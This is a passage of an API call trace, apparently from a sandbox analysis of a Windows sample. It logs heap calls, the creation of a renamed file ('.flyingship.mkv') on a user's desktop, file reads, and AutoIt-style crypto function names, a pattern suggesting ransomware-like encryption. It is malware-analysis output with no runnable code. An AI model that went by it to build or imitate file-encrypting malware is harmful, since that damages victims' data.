(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0161.472] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0161.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0161.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0161.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0161.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gv7qjagby9a.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0161.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0161.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0161.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0161.475] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0161.476] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0161.476] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0161.479] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x8b40, lpOverlapped=0x0) returned 1 [0161.480] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0161.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b40) returned 0xa6d008 [0161.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0161.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b40) returned 0x9e5190 [0161.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6d008 | out: hHeap=0x8a0000) returned 1 [0161.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.483] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b40) returned 0xa6d008 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6d008 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0161.484] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.484] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0161.484] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b40) returned 0xa6d008 [0161.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0161.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0161.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0161.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0161.485] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0161.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0161.486] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18b40) returned 0x9fdcd8 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0161.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0161.487] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0161.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0161.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0161.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0161.488] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0161.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0161.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.488] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0161.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.488] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0161.488] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0161.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.489] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.489] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0161.489] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.489] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 